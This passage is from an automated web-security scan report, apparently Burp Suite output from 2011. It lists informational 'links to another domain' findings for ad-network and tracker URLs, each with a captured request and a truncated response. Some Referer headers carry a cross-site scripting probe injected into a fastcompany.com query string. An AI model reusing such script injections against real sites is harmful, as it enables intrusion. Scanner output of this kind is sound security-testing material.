bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#
=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0201.rm.sp2
Set-Cookie: ih="b!!!!#!3e]N!!!!#=4X%/"; path=/; expires=Wed, 11-Sep-2013 12:48:37 GMT
Set-Cookie: vuday1=Ve/>3!4j#()xxac; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Set-Cookie: uid=uid=88b682c8-dd3d-11e0-8111-78e7d162bf12&_hmacv=1&_salt=2987826240&_keyid=k1&_hmac=d6fc6e23e1a639a39e50969336a0089f0e9aba40; path=/; expires=Wed, 12-Oct-2011 12:48:37 GMT
Set-Cookie: liday1=:Op`R$4^M4!4j#(@7q_<; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:37 GMT
Pragma: no-cache
Content-Length: 712
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10293202
...[SNIP]...
</script><script language='javascript' type='text/javascript' src='http://imp.fetchback.com/serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyGU7cAGuPgwIBKUxdsQ9Q3BWxA1EZ3x6w0qfIB96GlPW2ywlNI0NZFhE4MiywKGDSB5unV2lqUhxhgGAMekDiJaeYtd7gINuD%2E3CeIfiEcy3H8lb25tJ3bNnjd62dHvf963hQDLsM7%2EBYxmzTT0uPrqnHTuSxm6TcL9vBgnMRZBiKJkVgiYVkIOTsJDRASLMpKZuZZ5IeTquS5jGLdD3te0Q1Vde7qulOqeL%2Dp635yOWTe7lPobpv5WYg%3D%3D%2C'></script>
...[SNIP]...

11.21. http://ads.bluelithium.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:32 GMT
Pragma: no-cache
Content-Length: 4577
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

11.22. http://ads.dotomi.com/ads_smokey_pure.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.dotomi.com
Path:   /ads_smokey_pure.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ads_smokey_pure.php?ms=11 HTTP/1.1
Host: ads.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=11&btg=1&mp=1&dres=iframe&rwidth=300&rheight=250&pp=0&cg=42&tz=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.17
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP"
Vary: Accept-Encoding
Content-Length: 291
Content-Type: text/html; charset=UTF-8
Date: Mon, 12 Sep 2011 12:49:18 GMT
Connection: close

<html>
<head></head>
<body bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><a href="http://www.smokeybear.com/" target="_blank"><IMG alt="www.smokeybear.com" border="0" src="http://ads.dotomi.com/banners/smokey/300.gif">
...[SNIP]...

11.23. http://ads.dotomi.com/ads_smokey_pure.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.dotomi.com
Path:   /ads_smokey_pure.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ads_smokey_pure.php?ms=18 HTTP/1.1
Host: ads.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.17
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP"
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=UTF-8
Date: Mon, 12 Sep 2011 12:48:34 GMT
Connection: close

<html>
<head></head>
<body bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><a href="http://www.smokeybear.com/take-pledge.asp" target="_blank"><IMG alt="www.smokeybear.com" border="0" src="http://ads.dotomi.com/banners/smokey/728.gif">
...[SNIP]...

11.24. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://ad.doubleclick.net/click;h=v8/3b80/3/0/*/u;236265776;0-0;0;42089989;14458-1000/30;41027854/41045641/1;;~aopt=2/0/c8/0;~sscs=?http://clk.pointroll.com/bc/?a=1509596&c=1&i=BEAC0400-E930-14A8-1309-7200003E0101&clickurl=http://ad.doubleclick.net/click%3Bh=v2%7C3D92%7C0%7C0%7C%252a%7Cs%3B237068583%3B0-0%3B0%3B60629732%3B31-1%7C1%3B40663339%7C40681126%7C1%3B%3B%3Bpc=[TPAS_ID]%253fhttp://www.lincoln.com/crossovers/mkx/experiencemkx/%3Fbannerid=1055855%7C60629732%7C237068583%7C0%26referrer=N3016.FastCompany'><img border=0 width='1000' height='30' style='width:1000px;height:30px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Ford/876608/Lincoln-MKX-Fast-Company-Pushdown_1000x30_Dflt.jpg?PRAd=15095
...[SNIP]...

11.25. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adunit.cdn.auditude.com
Path:   /flash/modules/display/auditudeDisplayLib.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /flash/modules/display/auditudeDisplayLib.js?callback=ndn.auditudeCallback&width=275&height=200&version=adunit-1.0&domain=auditude.com&zoneId=&mediaId=23408962&parentNode=auditudeContent&keyValues=dpid=;sitesection=;sec=oth;sub=;wgt=1;width=275;height=200;url=http://savannahnow.com/&autoPlay=true&ndnR=14&countdownMessage=Todays%20Top%20Videos%20available%20in%20{countdown} HTTP/1.1
Host: adunit.cdn.auditude.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Cache-Control: must-revalidate
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:22 GMT
ETag: "2736172791"
Expires: Mon, 12 Sep 2011 12:49:22 GMT
Last-Modified: Fri, 06 May 2011 17:05:19 GMT
Server: ECS (sjo/5238)
X-Cache: HIT
Content-Length: 11744

(function() {

   var PLAYER_SWF_URL = 'http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView';
   var AUD_SCRIPT_IDENTIFIER = 'auditudeDisplayLib.js';

   // Flash Player Version Detecti
...[SNIP]...
<td align="center"><a href="http://www.adobe.com/go/getflash/" style="color:white">' +
           '<span style="font-size:12px">
...[SNIP]...

11.26. http://btg.mtvnservices.com/aria/coda.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://btg.mtvnservices.com
Path:   /aria/coda.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /aria/coda.html?site=mtv.co.uk HTTP/1.1
Host: btg.mtvnservices.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
ETag: "f299a3dae78bb253e97d79cdd330980c:1315483817"
Vary: Accept-Encoding
Cache-Control: max-age=60
Date: Mon, 12 Sep 2011 12:49:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 256625


                                                                                                                                                       //Including Coda 2 build.
               // CODA 2.40 dated 07-Sep-2011 Wed 11:52 AM
/*    SWFObject v2.2 <http://code.google.com/p/swfobject/>
   is r
...[SNIP]...
<p><a href="http://www.adobe.com/go/getflashplayer">Download the free Flash Player now!</a><br/><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /> </a>
...[SNIP]...

11.27. http://choices.truste.com/ca

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ca?aid=abs01&pid=mec01&cid=0811abs728x90&w=728&h=90&c=abs01cont19&js=2 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:04 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 22808
Connection: keep-alive

truste.ca.addClearAdIcon=function(D){if(!truste.ca[D.baseName+"_bi"]){truste.ca[D.baseName+"_bi"]=D}truste.ca.adTypeMap[D.baseName]=1;
var c=truste.ca.findCreative(D);if(!c){var q=null;if(truste.ca.IE
...[SNIP]...
</span>';
var a="http://choices.truste.com/assets/admarker.swf";var j="77";if(m.cam=="3"||m.cam=="4"){a="http://choices.truste.com/get?name=adicon.swf";
j="20"}var g='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="'+j+'" height="16" style="position: relative"><param name="flashVars" value="bindingId='+m.baseName+'"/>
...[SNIP]...
<img width="77px" height="15px" src="'+m.icon_cam_mo+'" style="border:none;position:absolute;right:0px;top:0;">';
if(h){k='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="77" height="16" style="position: relative"><param name="flashVars" value="bindingId='+m.baseName+'"/>
...[SNIP]...

11.28. http://choices.truste.com/ca

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont19&w=728&h=90 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:47:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 6592
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<hr />\n <a href="http://www.att.com/gen/privacy-policy?pid=2506" target="_blank">AT&T Privacy Policy &raquo;</b>
...[SNIP]...

11.29. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=34779547 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Found
Location: http://p.raasnet.com/partners/pixel?t=gcm&id=CAESEKhDLfTHbxj77UOiLKpphxM&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 12 Sep 2011 13:06:07 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 284
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://p.raasnet.com/partners/pixel?t=gcm&amp;id=CAESEKhDLfTHbxj77UOiLKpphxM&amp;cver=1">here</A>
...[SNIP]...

11.30. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://seg.sharethis.com/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&google_error=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 12 Sep 2011 12:40:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 295
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://seg.sharethis.com/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&amp;google_error=1">here</A>
...[SNIP]...

11.31. http://cm.npc-morris.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:41 GMT
